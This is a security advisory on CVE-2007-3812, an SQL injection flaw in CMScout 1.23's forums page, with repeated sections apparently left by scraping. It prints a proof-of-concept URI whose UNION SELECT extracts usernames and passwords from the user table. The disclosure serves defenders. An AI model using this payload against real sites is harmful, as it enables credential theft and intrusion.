CMScout Forums.PHP SQL Injection Vulnerability
BID:24906
Info
CMScout Forums.PHP SQL Injection Vulnerability
| Bugtraq ID: | 24906 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-3812 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 13 2007 12:00AM |
| Updated: | May 07 2015 05:37PM |
| Credit: | FiSh is credited with the discovery of this vulnerability. |
| Vulnerable: |
CMScout CMScout 1.23 |
| Not Vulnerable: | |
Discussion
CMScout Forums.PHP SQL Injection Vulnerability
CMScout is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
This issue affects CMScout 1.23; other versions may also be vulnerable.
CMScout is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
This issue affects CMScout 1.23; other versions may also be vulnerable.
Exploit / POC
CMScout Forums.PHP SQL Injection Vulnerability
An attacker can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/index.php?page=forums&f=1/**/union/**/all/**/select/**/0,uname,passwd,2,3,4,5,6,7,8/**/from/**/cms_authuser/*
An attacker can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/index.php?page=forums&f=1/**/union/**/all/**/select/**/0,uname,passwd,2,3,4,5,6,7,8/**/from/**/cms_authuser/*
Solution / Fix
CMScout Forums.PHP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].